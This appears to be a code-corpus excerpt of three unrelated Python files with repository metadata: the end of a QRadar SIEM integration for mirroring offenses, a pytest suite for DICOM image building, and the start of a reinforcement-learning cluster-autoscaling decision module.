events_count=int(final_offense_data.get('event_count', 0)),
events_mirrored=len(final_offense_data.get('events', [])))
final_offense_data['last_mirror_in_time'] = datetime.now().isoformat()
final_offense_data['mirroring_events_message'] = events_message
return GetRemoteDataResponse(final_offense_data, entries)
@safely_update_context_data
def add_modified_remote_offenses(context_data: dict, version: str, mirror_options: str, new_modified_records_ids: list,
current_last_update: str, offenses: list) -> Tuple[dict, str, list]:
"""Add modified remote offenses to context_data and handle exhausted offenses.
Args:
context_data: The context data to update.
version: The version of the context data to update.
mirror_options: The mirror options for the integration.
new_modified_records_ids: The new modified offenses ids.
current_last_update: The current last mirror update.
offenses: The offenses to update.
Returns: (The new context data, The context_data version the changes were based on, The new modified records ids)
"""
new_context_data = context_data.copy()
print_debug_msg(f'Saving New Highest ID: {context_data.get(LAST_FETCH_KEY, 0)}')
new_context_data.update({'last_mirror_update': current_last_update})
if mirror_options == MIRROR_OFFENSE_AND_EVENTS:
print_mirror_events_stats(new_context_data, "Get Modified Remote Data - Before update")
mirrored_offenses = merge_lists(original_list=context_data.get(MIRRORED_OFFENSES_CTX_KEY, []),
updated_list=offenses,
key='id')
new_context_data.update({MIRRORED_OFFENSES_CTX_KEY: mirrored_offenses})
remaining_resubmitted_offenses = context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY, []).copy()
updated_mirrored_offenses = context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, [])
clean_updates_mirrored_offenses = updated_mirrored_offenses.copy()
if remaining_resubmitted_offenses:
for offense in updated_mirrored_offenses:
if str(offense.get("id")) in remaining_resubmitted_offenses:
print_debug_msg(f"Removing Offense id {offense.get('id')} from processing Mirrored Events "
f"since its incident is not responding. (It is probably closed)")
clean_updates_mirrored_offenses.remove(offense)
new_context_data.update({UPDATED_MIRRORED_OFFENSES_CTX_KEY: clean_updates_mirrored_offenses})
new_context_data.update({RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY: []})
clean_updates_mirrored_offenses_ids = [str(offense.get('id')) for offense in clean_updates_mirrored_offenses]
if clean_updates_mirrored_offenses_ids:
new_modified_records_ids = list(set(new_modified_records_ids + clean_updates_mirrored_offenses_ids))
new_context_data.update({RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY: clean_updates_mirrored_offenses_ids})
print_mirror_events_stats(new_context_data, "Get Modified Remote Data - After update")
return encode_context_data(new_context_data, include_id=False), version, new_modified_records_ids
def get_modified_remote_data_command(client: Client, params: Dict[str, str],
args: Dict[str, str]) -> GetModifiedRemoteDataResponse:
"""
Performs API calls to QRadar service, querying for offenses that were updated in QRadar later than
the last update time given in the argument 'lastUpdate'.
Args:
client (Client): QRadar client to perform the API calls.
params (Dict): Demisto params.
args (Dict): Demisto arguments.
Returns:
(GetModifiedRemoteDataResponse): IDs of the offenses that have been modified in QRadar.
"""
raw_ctx, ctx_version = get_integration_context_with_version()
ctx = extract_context_data(raw_ctx, include_id=True)
remote_args = GetModifiedRemoteDataArgs(args)
highest_fetched_id = ctx.get(LAST_FETCH_KEY, 0)
limit: int = int(params.get('mirror_limit', MAXIMUM_MIRROR_LIMIT))
range_ = f'items=0-{limit - 1}'
last_update_time = ctx.get('last_mirror_update', 0)
if not last_update_time:
last_update_time = remote_args.last_update
last_update = get_time_parameter(last_update_time, epoch_format=True)
# if this call fails, raise an error and stop command execution
offenses = client.offenses_list(range_=range_,
filter_=f'id <= {highest_fetched_id} AND last_persisted_time > {last_update}',
sort='+last_persisted_time',
fields='id,start_time,event_count,last_persisted_time')
new_modified_records_ids = [str(offense.get('id')) for offense in offenses if 'id' in offense]
current_last_update = last_update if not offenses else offenses[-1].get('last_persisted_time')
new_modified_records_ids = add_modified_remote_offenses(context_data=ctx, version=ctx_version,
mirror_options=params.get('mirror_options'),
new_modified_records_ids=new_modified_records_ids,
current_last_update=current_last_update,
offenses=offenses)
return GetModifiedRemoteDataResponse(new_modified_records_ids)
def clear_integration_ctx(ctx: dict) -> dict:
"""Return a cleared context_data dict so set_integration_context could be called on it.
Calling set_integration_context with the output of this function ensures the next call to
set_to_integration_context_with_retries will not fail.
Args:
ctx: The context_data to simplify
Returns: The cleared context_data
"""
fetch_id_ctx: str = ctx.get(LAST_FETCH_KEY) or '0'
try:
fetch_id = int(fetch_id_ctx)
except ValueError:
try:
fetch_id = int(json.loads(fetch_id_ctx))
except ValueError:
print_debug_msg(f"Could not retrive LAST_FETCH_KEY from {fetch_id_ctx} Setting to 0")
fetch_id = 0
last_update_ctx: str = ctx.get('last_mirror_update') or '0'
try:
last_update = str(int(last_update_ctx))
except ValueError:
try:
last_update = str(int(json.loads(last_update_ctx)))
except ValueError:
print_debug_msg(f"Could not retrive last_mirror_update from {last_update_ctx} Setting to '0'")
last_update = '0'
return {LAST_FETCH_KEY: json.dumps(fetch_id),
'last_mirror_update': json.dumps(last_update),
UPDATED_MIRRORED_OFFENSES_CTX_KEY: '[]',
MIRRORED_OFFENSES_CTX_KEY: '[]',
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY: '[]',
'samples': '[]'}
def change_ctx_to_be_compatible_with_retry() -> None:
"""
In order to move QRadar from using set_integration_context to set_to_integration_context_with_retries, the fields
need to change to JSON strings.
    The change is required due to a race condition occurring between get-modified-remote-data and long-running-execution.
    Because some customers already have running instances whose fields are not JSON strings, this function is needed
    to make them compatible with the new changes.
Returns:
(None): Modifies context to be compatible.
"""
ctx = get_integration_context()
new_ctx = ctx.copy()
try:
extracted_ctx = extract_context_data(ctx)
print_mirror_events_stats(extracted_ctx, "Checking ctx")
print_debug_msg("ctx was found to be compatible with retries")
extract_works = True
except Exception as e:
print_debug_msg(f"extracting ctx {ctx} failed, trying to make it retry compatible. Error was: {str(e)}")
extract_works = False
if not extract_works:
cleared_ctx = clear_integration_ctx(new_ctx)
print_debug_msg(f"Change ctx context data was cleared and changing to {cleared_ctx}")
set_integration_context(cleared_ctx)
print_debug_msg(f"Change ctx context data was cleared and changed to {cleared_ctx}")
''' MAIN FUNCTION '''
def main() -> None:
params = demisto.params()
command = demisto.command()
args = demisto.args()
# handle allowed advanced parameters
adv_params = params.get('adv_params')
if adv_params:
try:
globals_ = globals()
for adv_p in adv_params.split(','):
adv_p_kv = [item.strip() for item in adv_p.split('=')]
if len(adv_p_kv) != 2:
raise DemistoException(
f'Failed to parse advanced parameter: {adv_p} - please make sure you entered it correctly.')
adv_param_name = adv_p_kv[0]
if adv_param_name in ADVANCED_PARAMETERS_STRING_NAMES:
globals_[adv_p_kv[0]] = adv_p_kv[1]
elif adv_param_name in ADVANCED_PARAMETER_INT_NAMES:
globals_[adv_p_kv[0]] = int(adv_p_kv[1])
else:
raise DemistoException(
f'The parameter: {adv_p_kv[0]} is not a valid advanced parameter. Please remove it')
except DemistoException as e:
raise DemistoException(f'Failed to parse advanced params. Error: {e.message}')
except Exception as e:
raise DemistoException(f'Failed to parse advanced params. Error: {e}')
server = params.get('server')
verify_certificate = not params.get('insecure', False)
proxy = params.get('proxy', False)
api_version = params.get('api_version')
if float(api_version) < MINIMUM_API_VERSION:
raise DemistoException(f'API version cannot be lower than {MINIMUM_API_VERSION}')
credentials = params.get('credentials')
try:
client = Client(
server=server,
verify=verify_certificate,
proxy=proxy,
api_version=api_version,
credentials=credentials)
        # Command names joined with 'or' support the QRadar v2 command names for backward compatibility
if command == 'test-module':
return_results(test_module_command(client, params))
elif command == 'fetch-incidents':
demisto.incidents(fetch_incidents_command())
elif command == 'long-running-execution':
change_ctx_to_be_compatible_with_retry()
support_multithreading()
long_running_execution_command(client, params)
elif command == 'qradar-offenses-list' or command == 'qradar-offenses' or command == 'qradar-offense-by-id':
return_results(qradar_offenses_list_command(client, args))
elif command == 'qradar-offense-update' or command == 'qradar-update-offense':
return_results(qradar_offense_update_command(client, args))
elif command == 'qradar-closing-reasons' or command == 'qradar-get-closing-reasons':
return_results(qradar_closing_reasons_list_command(client, args))
elif command == 'qradar-offense-notes-list' or command == 'qradar-get-note':
return_results(qradar_offense_notes_list_command(client, args))
elif command == 'qradar-offense-note-create' or command == 'qradar-create-note':
return_results(qradar_offense_notes_create_command(client, args))
elif command == 'qradar-rules-list':
return_results(qradar_rules_list_command(client, args))
elif command == 'qradar-rule-groups-list':
return_results(qradar_rule_groups_list_command(client, args))
elif command == 'qradar-assets-list' or command == 'qradar-get-assets' or command == 'qradar-get-asset-by-id':
return_results(qradar_assets_list_command(client, args))
elif command == 'qradar-saved-searches-list':
return_results(qradar_saved_searches_list_command(client, args))
elif command == 'qradar-searches-list':
return_results(qradar_searches_list_command(client, args))
elif command == 'qradar-search-create' or command == 'qradar-searches':
return_results(qradar_search_create_command(client, args))
elif command == 'qradar-search-status-get' or command == 'qradar-get-search':
return_results(qradar_search_status_get_command(client, args))
elif command == 'qradar-search-results-get' or command == 'qradar-get-search-results':
return_results(qradar_search_results_get_command(client, args))
elif command == 'qradar-reference-sets-list' or command == 'qradar-get-reference-by-name':
return_results(qradar_reference_sets_list_command(client, args))
elif command == 'qradar-reference-set-create' or command == 'qradar-create-reference-set':
return_results(qradar_reference_set_create_command(client, args))
elif command == 'qradar-reference-set-delete' or command == 'qradar-delete-reference-set':
return_results(qradar_reference_set_delete_command(client, args))
elif command == 'qradar-reference-set-value-upsert' or command == 'qradar-create-reference-set-value' or \
command == 'qradar-update-reference-set-value':
return_results(qradar_reference_set_value_upsert_command(client, args))
elif command == 'qradar-reference-set-value-delete' or command == 'qradar-delete-reference-set-value':
return_results(qradar_reference_set_value_delete_command(client, args))
elif command == 'qradar-domains-list' or command == 'qradar-get-domains' or \
command == 'qradar-get-domain-by-id':
return_results(qradar_domains_list_command(client, args))
elif command == 'qradar-indicators-upload' or command == 'qradar-upload-indicators':
return_results(qradar_indicators_upload_command(client, args))
elif command == 'qradar-geolocations-for-ip':
return_results(qradar_geolocations_for_ip_command(client, args))
elif command == 'qradar-log-sources-list':
return_results(qradar_log_sources_list_command(client, args))
elif command == 'qradar-get-custom-properties':
return_results(qradar_get_custom_properties_command(client, args))
elif command == 'qradar-ips-source-get':
return_results(qradar_ips_source_get_command(client, args))
elif command == 'qradar-ips-local-destination-get':
return_results(qradar_ips_local_destination_get_command(client, args))
elif command == 'qradar-reset-last-run':
return_results(qradar_reset_last_run_command())
elif command == 'get-mapping-fields':
return_results(qradar_get_mapping_fields_command(client))
elif command == 'get-remote-data':
change_ctx_to_be_compatible_with_retry()
return_results(get_remote_data_command(client, params, args))
elif command == 'get-modified-remote-data':
change_ctx_to_be_compatible_with_retry()
return_results(get_modified_remote_data_command(client, params, args))
else:
raise NotImplementedError(f'''Command '{command}' is not implemented.''')
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
print_debug_msg(f"The integration context_data is {get_integration_context()}")
return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
register_signal_handler_profiling_dump(profiling_dump_rows_limit=PROFILING_DUMP_ROWS_LIMIT)
main()
|
demisto/content
|
Packs/QRadar/Integrations/QRadar_v3/QRadar_v3.py
|
Python
|
mit
| 164,136
| 0.003649
|
import os
from collections import defaultdict
from dataclasses import asdict
from pathlib import Path
from unittest import mock
import numpy as np
import pydicom
import pytest
from panimg.image_builders.dicom import (
_get_headers_by_study,
_validate_dicom_files,
format_error,
image_builder_dicom,
)
from panimg.image_builders.metaio_utils import parse_mh_header
from panimg.panimg import _build_files
from grandchallenge.cases.models import Image
from tests.cases_tests import RESOURCE_PATH
DICOM_DIR = RESOURCE_PATH / "dicom"
def test_get_headers_by_study():
files = [Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]]
studies = _get_headers_by_study(files, defaultdict(list))
assert len(studies) == 1
for key in studies:
assert [str(x["file"]) for x in studies[key]["headers"]] == [
f"{DICOM_DIR}/{x}.dcm" for x in range(1, 77)
]
for root, _, files in os.walk(RESOURCE_PATH):
files = [Path(root).joinpath(f) for f in files]
break
studies = _get_headers_by_study(files, defaultdict(list))
assert len(studies) == 0
def test_validate_dicom_files():
files = [Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]]
studies = _validate_dicom_files(files, defaultdict(list))
assert len(studies) == 1
for study in studies:
headers = study.headers
assert study.n_time == 19
assert study.n_slices == 4
with mock.patch(
"panimg.image_builders.dicom._get_headers_by_study",
return_value={
"foo": {"headers": headers[1:], "file": "bar", "index": 1},
},
):
errors = defaultdict(list)
studies = _validate_dicom_files(files, errors)
assert len(studies) == 0
for header in headers[1:]:
assert errors[header["file"]] == [
format_error("Number of slices per time point differs")
]
def test_image_builder_dicom_4dct(tmpdir):
files = {Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]}
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert result.consumed_files == {
Path(DICOM_DIR).joinpath(f"{x}.dcm") for x in range(1, 77)
}
assert len(result.new_images) == 1
image = Image(**asdict(result.new_images.pop()))
assert image.shape == [19, 4, 2, 3]
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
direction = headers["TransformMatrix"].split()
origin = headers["Offset"].split()
spacing = headers["ElementSpacing"].split()
exposures = headers["Exposures"].split()
content_times = headers["ContentTimes"].split()
assert len(exposures) == 19
assert exposures == [str(x) for x in range(100, 2000, 100)]
assert len(content_times) == 19
assert content_times == [str(x) for x in range(214501, 214520)]
dcm_ref = pydicom.dcmread(str(DICOM_DIR / "1.dcm"))
assert np.array_equal(
np.array(list(map(float, direction))).reshape((4, 4)), np.eye(4)
)
assert np.allclose(
list(map(float, spacing))[:2],
        list(map(float, dcm_ref.PixelSpacing)),
)
assert np.allclose(
list(map(float, origin)),
list(map(float, dcm_ref.ImagePositionPatient)) + [0.0],
)
@pytest.mark.parametrize(
"folder,element_type",
[
("dicom", "MET_SHORT"),
("dicom_intercept", "MET_FLOAT"),
("dicom_slope", "MET_FLOAT"),
],
)
def test_dicom_rescaling(folder, element_type, tmpdir):
"""
2.dcm in dicom_intercept and dicom_slope has been modified to add a
small intercept (0.01) or slope (1.001) respectively.
"""
files = [
Path(d[0]).joinpath(f)
for d in os.walk(RESOURCE_PATH / folder)
for f in d[2]
]
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
assert headers["ElementType"] == element_type
def test_dicom_window_level(tmpdir):
files = {
Path(d[0]).joinpath(f)
for d in os.walk(RESOURCE_PATH / "dicom")
for f in d[2]
}
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
assert headers["WindowCenter"] == "30"
assert headers["WindowWidth"] == "200"
assert len(result.new_images) == 1
image_obj = result.new_images.pop()
assert image_obj.window_center == 30.0
assert image_obj.window_width == 200.0
|
comic/comic-django
|
app/tests/cases_tests/test_dicom.py
|
Python
|
apache-2.0
| 5,037
| 0
|
__author__ = 'tiramola group'
import os, datetime, operator, math, random, itertools, time
import numpy as np
from lib.fuzz import fgraph, fset
from scipy.cluster.vq import kmeans2
from lib.persistance_module import env_vars
from scipy.stats import linregress
from collections import deque
from lib.tiramola_logging import get_logger
from Predictor import Predictor
class RLDecisionMaker:
def __init__(self, cluster):
#Create logger
LOG_FILENAME = 'files/logs/Coordinator.log'
self.log = get_logger('RLDecisionMaker', 'INFO', logfile=LOG_FILENAME)
self.log.info("Using 'gain' : " + env_vars['gain'] +" with threshold of "+str( env_vars["decision_threshold"]*100) + "% and interval: " + str(env_vars['decision_interval']))
self.log.info("Cluster Size from %d to %d nodes" % (env_vars['min_cluster_size'], env_vars['max_cluster_size']))
self.debug = False
if self.debug:
self.currentState = 8
else:
self.currentState = cluster.node_count()
self.cluster = cluster
self.nextState = self.currentState
self.waitForIt = env_vars['decision_interval'] / env_vars['metric_fetch_interval']
self.pending_action = None
self.decision = {"action": "PASS", "count": 0}
# The policy for getting throughput and latency when computing the reward func.
# average, centroid
self.measurementsPolicy = 'centroid'
self.prediction = env_vars['use_prediction']
self.predictor = Predictor()
# used only in simulation!!
self.countdown = 0
# A dictionary that will remember rewards and metrics in states previously visited
self.memory = {}
for i in range(env_vars["min_cluster_size"], env_vars["max_cluster_size"] + 1):
self.memory[str(i)] = {}
#self.memory[str(i)]['V'] = None # placeholder for rewards and metrics
self.memory[str(i)]['r'] = None
self.memory[str(i)]['arrayMeas'] = None
# Load any previous statics.
self.measurementsFile = env_vars["measurements_file"]
self.trainingFile = env_vars["training_file"]
self.sumMetrics = {}
# initialize measurements file
meas = open(self.measurementsFile, 'a+')
if os.stat(self.measurementsFile).st_size == 0:
# The file is empty, set the headers for each column.
meas.write('State\t\tLambda\t\tThroughput\t\tLatency\t\tCPU\t\tTime\n')
meas.close()
# load training set
meas = open(self.trainingFile, 'r+')
if os.stat(self.trainingFile).st_size != 0:
# Read the training set measurements saved in the file.
meas.next() # Skip the first line with the headers of the columns
for line in meas:
# Skip comments (used in training sets)
if not line.startswith('###'):
m = line.split('\t\t')
self.add_measurement(m)
meas.close()
def add_measurement(self, metrics, write_file=False, write_mem=True):
"""
        Adds the measurement to memory, to the measurements file, or to both.
        @param metrics: array The metrics to store: [state, lambda, throughput, latency, cpu, time]
        @param write_file: boolean If set, write the measurement to the measurements txt file
        @param write_mem: boolean If set, store the measurement in memory
        :return:
"""
if self.measurementsPolicy.startswith('average'):
if not self.sumMetrics.has_key(metrics[0]):
# Save the metric with the state as key metrics = [state, inlambda, throughput, latency]
self.sumMetrics[metrics[0]] = {'inlambda': 0.0, 'throughput': 0.0, 'latency': 0.0, 'divide_by': 0}
self.sumMetrics[metrics[0]] = {'inlambda': self.sumMetrics[metrics[0]]['inlambda'] + float(metrics[1]),
'throughput': self.sumMetrics[metrics[0]]['throughput'] + float(metrics[2]),
'latency': self.sumMetrics[metrics[0]]['latency'] + float(metrics[3]),
'divide_by': self.sumMetrics[metrics[0]]['divide_by'] + 1}
if self.debug and write_file:
self.log.debug("add_measurements: won't load measurement to memory")
else:
if write_mem:
                # metrics -> 0: state, 1: lambda, 2: throughput, 3: latency, 4: cpu, 5: time
if not self.memory.has_key(metrics[0]):
self.memory[str(metrics[0])] = {}
#self.memory[str(metrics[0])]['V'] = None # placeholder for rewards and metrics
self.memory[str(metrics[0])]['r'] = None
self.memory[str(metrics[0])]['arrayMeas'] = np.array([float(metrics[1]), float(metrics[2]),
float(metrics[3]), float(metrics[4])], ndmin=2)
elif self.memory[metrics[0]]['arrayMeas'] is None:
self.memory[metrics[0]]['arrayMeas'] = np.array([float(metrics[1]), float(metrics[2]),
float(metrics[3]), float(metrics[4])], ndmin=2)
else:
self.memory[metrics[0]]['arrayMeas'] = np.append(self.memory[metrics[0]]['arrayMeas'],
[[float(metrics[1]), float(metrics[2]),
float(metrics[3]), float(metrics[4])]], axis=0)
# but add 1 zero measurement for each state for no load cases ??? too many 0s affect centroids?
if write_file:
if write_mem:
used = "Yes"
else:
used = "No"
ms = open(self.measurementsFile, 'a')
# metrics[5] contains the time tick -- when running a simulation, it represents the current minute,
# on actual experiments, it is the current time. Used for debugging and plotting
ms.write(str(metrics[0]) + '\t\t' + str(metrics[1]) + '\t\t' + str(metrics[2]) + '\t\t' +
str(metrics[3]) + '\t\t' + str(metrics[4]) + '\t\t' + str(metrics[5]) + '\t\t'+ used+'\n')
ms.close()
# param state: string Get the average metrics (throughput, latency) for this state.
# return a dictionary with the averages
def get_averages(self, state):
averages = {}
if self.sumMetrics.has_key(state):
averages['throughput'] = float(self.sumMetrics[state]['throughput'] / self.sumMetrics[state]['divide_by'])
averages['latency'] = float(self.sumMetrics[state]['latency'] / self.sumMetrics[state]['divide_by'])
self.log.debug("GETAVERAGES Average metrics for state: " + state + " num of measurements: " + str(
self.sumMetrics[state]['divide_by']) +
" av. throughput: " + str(averages['throughput']) + " av. latency: " +
str(averages['latency']))
return averages
def doKmeans(self, state, from_inlambda, to_inlambda):
# Run kmeans for the measurements of this state and return the centroid point (throughput, latency)
ctd = {}
label = []
centroids = {}
        if self.memory[state]['arrayMeas'] is not None:
count_state_measurements = len(self.memory[state]['arrayMeas'])
# self.log.debug("DOKMEANS " + str(len(self.memory[state]['arrayMeas'])) +
# " measurements available for state " + state)
sliced_data = None
for j in self.memory[state]['arrayMeas']:
#self.my_logger.debug("DOKMEANS self.memory[state]['arrayMeas'][j]: "+ str(j))
                # If this measurement belongs in the slice we're interested in
if j[0] >= from_inlambda and j[0] <= to_inlambda:
#self.my_logger.debug("DOKMEANS adding measurement : "+ str(j))
# add it
                    if sliced_data is None:
sliced_data = np.array(j, ndmin=2)
else:
sliced_data = np.append(sliced_data, [j], axis=0)
k = 1 # number of clusters
            # 1. No known lambda values close to the current lambda measurement
            if sliced_data is None:
# Check if there are any known values from +-50% inlambda.
# original_inlambda = float(from_inlambda* (10/9))
# from_inlambda = 0.8 * original_inlambda
# to_inlambda = 1.2 * original_inlambda
# self.my_logger.debug("Changed lambda range to +- 20%: "+ str(from_inlambda) + " - "+ str(to_inlambda))
# for j in self.memory[state]['arrayMeas']:
# #self.my_logger.debug("DOKMEANS self.memory[state]['arrayMeas'][j]: "+ str(j))
# # If this measurement belongs in the slice we're insterested in
# if j[0] >= from_inlambda and j[0] <= to_inlambda:
# # add it
# if sliced_data == None:
# sliced_data = np.array(j, ndmin=2)
# else:
# sliced_data = np.append(sliced_data, [j], axis=0)
# #centroids, label = kmeans2(self.memory[state]['arrayMeas'], k, minit='points') # (obs, k)
# #else:
# if sliced_data == None:
self.log.debug("No known lamdba values close to current lambda measurement. Returning zeros!")
else:
# self.log.debug("DOKMEANS length of sliced_data to be fed to kmeans: " + str(len(sliced_data))
# + " (out of %d total)" % count_state_measurements)
centroids, label = kmeans2(sliced_data, k, minit='points')
pass
# initialize dictionary
num_of_meas = {}
#num_of_meas = {'0': 0, '1': 0, '2': 0, '3': 0, '4': 0}
for j in range(0, k):
num_of_meas[str(j)] = 0
if len(label) > 0:
for i in label:
num_of_meas[str(i)] += 1
max_meas_cluster = max(num_of_meas.iteritems(), key=operator.itemgetter(1))[0]
# self.my_logger.debug("DOKMEANS state: "+ state +" kmeans2 centroids: "+ str(centroids) +" label: "+
# str(num_of_meas) + " cluster with max measurements: "+ str(max_meas_cluster))
ctd['inlambda'] = centroids[int(max_meas_cluster)][0]
ctd['throughput'] = centroids[int(max_meas_cluster)][1]
ctd['latency'] = centroids[int(max_meas_cluster)][2]
ctd['cpu'] = centroids[int(max_meas_cluster)][3]
else:
#self.log.debug("DOKMEANS one of the clusters was empty and so label is None :|. Returning zeros")
ctd['inlambda'] = 0.0
ctd['throughput'] = 0.0
ctd['latency'] = 0.0
ctd['cpu'] = 0.0
#return None
else:
self.log.debug("DOKMEANS self.memory[state]['arrayMeas'] is None :|")
return ctd
def moving_average(self, iterable, n=3):
# moving_average([40, 30, 50, 46, 39, 44]) --> 40.0 42.0 45.0 43.0
# http://en.wikipedia.org/wiki/Moving_average
it = iter(iterable)
d = deque(itertools.islice(it, n - 1))
d.appendleft(0)
s = sum(d)
for elem in it:
s += elem - d.popleft()
d.append(elem)
yield s / float(n)
def predict_load(self):
        # Linear regression to estimate the slope of the load
stdin, stdout = os.popen2("tail -n 20 " + self.measurementsFile)
stdin.close()
lines = stdout.readlines();
stdout.close()
ten_min_l = [] # store past 10 mins lambda's
ten_min = [] # store past 10 mins ticks
for line in lines:
m = line.split('\t\t') # state, lambda, throughput, latency, cpu, time tick
ten_min_l.append(float(m[1]))
ten_min.append(float(m[5]))
# run running average on the 10 mins lambda measurements
n = 5
run_avg_gen = self.moving_average(ten_min_l, n)
run_avg = []
for r in run_avg_gen:
run_avg.append(float(r))
ten_min_ra = ten_min[2:18] # np.arange(i-8, i-2, 1)
# linear regression on the running average
#(slope, intercept, r_value, p_value, stderr) = linregress(ten_min, ten_min_l)
(slope, intercept, r_value, p_value, stderr) = linregress(ten_min_ra, run_avg)
# fit the running average in a polynomial
coeff = np.polyfit(ten_min, ten_min_l, deg=2)
self.log.debug("Slope (a): " + str(slope) + " Intercept(b): " + str(intercept))
self.log.debug("Polynom coefficients: " + str(coeff))
#self.my_logger.debug("next 10 min prediction "+str(float(slope * (p + 10) + intercept + stderr)))
predicted_l = float(slope * (ten_min[19] + 10) + intercept + stderr) # lambda in 10 mins from now
#predicted_l = np.polyval(coeff, (ten_min[9] + 10)) # lambda in 10 mins from now
if slope > 0:
#if predicted_l > allmetrics['inlambda'] :
dif = 6000 + 10 * int(slope)
#dif = 6000 + 0.2 * int(predicted_l - allmetrics['inlambda'])
self.log.debug("Positive slope: " + str(slope) + " dif: " + str(dif)
+ ", the load is increasing. Moving the lambda slice considered 3K up")
else:
dif = -6000 + 10 * int(slope)
#dif = -6000 + 0.2 * int(predicted_l - allmetrics['inlambda'])
self.log.debug("Negative slope " + str(slope) + " dif: " + str(dif)
+ ", the load is decreasing. Moving the lambda slice considered 3K down")
#dif = ((predicted_l - allmetrics['inlambda'])/ allmetrics['inlambda']) * 0.1 * 6000#* allmetrics['inlambda']
#dif = int((predicted_l / allmetrics['inlambda']) * 6000)
return predicted_l
def publish_to_local_ganglia(self, allmetrics):
"""
Publishes monitoring data to local ganglia agent
:param allmetrics:
:return:
"""
self.log.debug( "TAKEDECISION allmetrics: " + str(allmetrics))
#Publish measurements to ganglia
try:
os.system("gmetric -n ycsb_inlambda -v " + str(
allmetrics['inlambda']) + " -d 15 -t float -u 'reqs/sec' -S " + str(
self.monitoring_endpoint) + ":[DEBUG] hostname")
os.system("gmetric -n ycsb_throughput -v " + str(
allmetrics['throughput']) + " -d 15 -t float -u 'reqs/sec' -S " + str(
self.monitoring_endpoint) + ":[DEBUG] hostname")
os.system(
"gmetric -n ycsb_latency -v " + str(allmetrics['latency']) + " -d 15 -t float -u ms -S " + str(
self.monitoring_endpoint) + ":[DEBUG] hostname")
except:
pass
def handle_metrics(self, client_metrics, server_metrics):
# read metrics
allmetrics = {'inlambda': 0, 'throughput': 0, 'latency': 0, 'cpu': 0}
if not self.debug:
            ## Aggregation of YCSB client metrics
clients = 0
servers = 0
# We used to collect server cpu too, do we need it?
#self.log.debug("TAKEDECISION state: %d, pending action: %s. Collecting metrics" % (self.currentState, str(self.pending_action)))
for host in client_metrics.keys():
metric = client_metrics[host]
if isinstance(metric, dict):
for key in metric.keys():
if key.startswith('ycsb_TARGET'):
allmetrics['inlambda'] += float(metric[key])
elif key.startswith('ycsb_THROUGHPUT'):
allmetrics['throughput'] += float(metric[key])
elif key.startswith('ycsb_READ') or key.startswith('ycsb_UPDATE') or key.startswith(
'ycsb_RMW') or key.startswith('ycsb_INSERT'):
allmetrics['latency'] += float(metric[key])
clients += 1
for host in server_metrics.keys():
metric = server_metrics[host]
if isinstance(metric, dict):
#check if host in active cluster hosts
if not host in self.cluster.get_hosts().keys():
continue
servers += 1
for key in metric.keys():
if key.startswith('cpu_idle'):
allmetrics['cpu'] += float(metric[key])
try:
allmetrics['latency'] = allmetrics['latency'] / clients
except:
allmetrics['latency'] = 0
try:
allmetrics['cpu'] = (allmetrics['cpu'] / servers) # average node cpu usage
except:
allmetrics['cpu'] = 0
else:
self.log.info("Running in DEBUG mode, no metrics retrieved!")
return allmetrics
# a log-related variable
pending_action_logged = False
def take_decision(self, client_metrics, server_metrics):
'''
this method reads allmetrics object created by Monitoring.py and decides whether a change
of the number of participating
virtual nodes is due.
'''
# update prediction current minute counter
self.predictor.tick_tock()
if client_metrics is None or server_metrics is None: return
# first parse all metrics
allmetrics = self.handle_metrics(client_metrics, server_metrics)
#self.publish_to_local_ganglia(allmetrics)
        pending_action = self.pending_action is not None  # true if there is a pending action
# 1. Save the current metrics to file and in memory only if there is no pending action.
self.add_measurement([str(self.currentState), allmetrics['inlambda'], allmetrics['throughput'],
allmetrics['latency'], allmetrics['cpu'],
datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")],
write_file=True, write_mem=((not pending_action) and bool(env_vars['update_metrics'])))
# if there is a pending action, don't take a decision
if pending_action:
            # track the logging flag on the instance (the class attribute provides the default)
            if not self.pending_action_logged:
                self.log.debug("Last action " + self.pending_action + " hasn't finished yet, see you later!")
                self.pending_action_logged = True
if self.debug:
if self.countdown == 0:
self.log.debug("Running a simulation, set state from " + str(self.currentState) + " to " +
str(self.nextState))
self.currentState = self.nextState
self.pending_action = None
else:
self.countdown -= 1
self.log.debug("Reducing countdown to " + str(self.countdown))
# skip decision
self.decision["action"] = "PASS"
self.decision["count"] = 0
return self.decision
        self.pending_action_logged = False
# manage the interval counter (waitForIt)
if self.waitForIt == 0:
self.waitForIt = env_vars['decision_interval'] / env_vars['metric_fetch_interval']
else:
if self.waitForIt == env_vars['decision_interval'] / env_vars['metric_fetch_interval']:
self.log.debug("New decision in " + str(float(self.waitForIt*env_vars['metric_fetch_interval'])/60) +
" mins, see you later!")
self.waitForIt -= 1
self.decision["action"] = "PASS"
self.decision["count"] = 0
return self.decision
        # Select values close to the current throughput; define the lambda range we're interested in (+/- slice_range)
slice_range=75
from_inlambda = allmetrics['inlambda'] - slice_range
to_inlambda = allmetrics['inlambda'] + slice_range
if self.prediction:
predicted_l = self.predictor.poly_regression()
if predicted_l > 0:
# there are enough data to make a prediction, if not use the actual lambda
self.log.debug(
"Predicted: " + str(predicted_l) + " lambda :" + str(allmetrics['inlambda']))
from_inlambda = predicted_l - slice_range
to_inlambda = predicted_l + slice_range
